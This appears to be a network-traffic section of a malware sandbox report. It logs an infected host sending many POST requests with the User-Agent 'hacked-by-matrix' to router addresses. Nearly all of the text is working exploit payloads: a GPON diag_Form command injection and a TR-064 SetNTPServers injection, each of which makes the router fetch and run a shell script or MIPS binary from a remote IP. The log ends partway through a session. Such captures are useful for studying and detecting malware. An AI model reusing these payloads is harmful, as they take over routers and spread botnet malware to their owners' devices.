                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1361192.168.2.135809442.54.161.144443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717139006 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1362192.168.2.1348906109.90.34.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717144012 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1363192.168.2.135683042.236.68.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717155933 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1364192.168.2.1335654212.131.172.72443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717175007 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1365192.168.2.135015042.237.217.19443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717211962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1366192.168.2.1342264212.52.158.168443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717216015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1367192.168.2.1346868212.124.163.228443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717226028 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1368192.168.2.13387805.185.253.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717237949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1369192.168.2.13461725.166.63.131443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717262983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1370192.168.2.1334768109.125.192.176443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717276096 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1371192.168.2.1351926118.2.62.68443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717297077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1372192.168.2.1336906118.204.253.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717308044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1373192.168.2.133279442.179.202.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717324018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1374192.168.2.134652642.122.189.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717358112 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1375192.168.2.1345876118.116.98.72443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717370033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1376192.168.2.13411825.222.149.151443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717379093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1377192.168.2.1358988118.140.70.74443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717402935 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1378192.168.2.1339142109.199.5.148443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717408895 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1379192.168.2.1343990212.105.175.148443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717436075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1380192.168.2.1346194109.224.60.126443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.717467070 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1381192.168.2.135325634.117.250.1857547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.846199989 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:18.547374964 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1382192.168.2.135916647.136.220.2187547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.881675005 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
